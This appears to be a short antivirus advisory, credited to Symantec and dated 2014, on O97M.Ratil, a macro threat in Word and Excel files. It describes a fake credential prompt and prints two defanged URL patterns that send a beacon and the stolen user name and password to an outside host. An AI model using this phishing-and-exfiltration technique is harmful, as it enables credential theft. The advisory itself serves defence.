Home / malware O97M.Ratil
First posted on 29 May 2014.
Source: SymantecAliases :
There are no other names known for O97M.Ratil.
Explanation :
The infected Microsoft Word and Microsoft Excel files contain macro code that sends a request to the following URL:
[http://]www.palmettogoodwill.org/files/report[REMOVED]MACRO_EXECUTED_WORD_SYNTA_PHARMA_P_ONLY&uname=NULL&pword=NULL
It then displays a dialogue box asking for user credentials.
When the user clicks OK, the macro code sends the stolen credentials to the following URL:
[http://]www.palmettogoodwill.org/files/report[REMOVED]SYNTA_PHARMA&uname=" & [USER NAME] & "&pword=" & [PASSWORD]
It then displays an image of a document from the Commonwealth of Massachusetts.Last update 29 May 2014
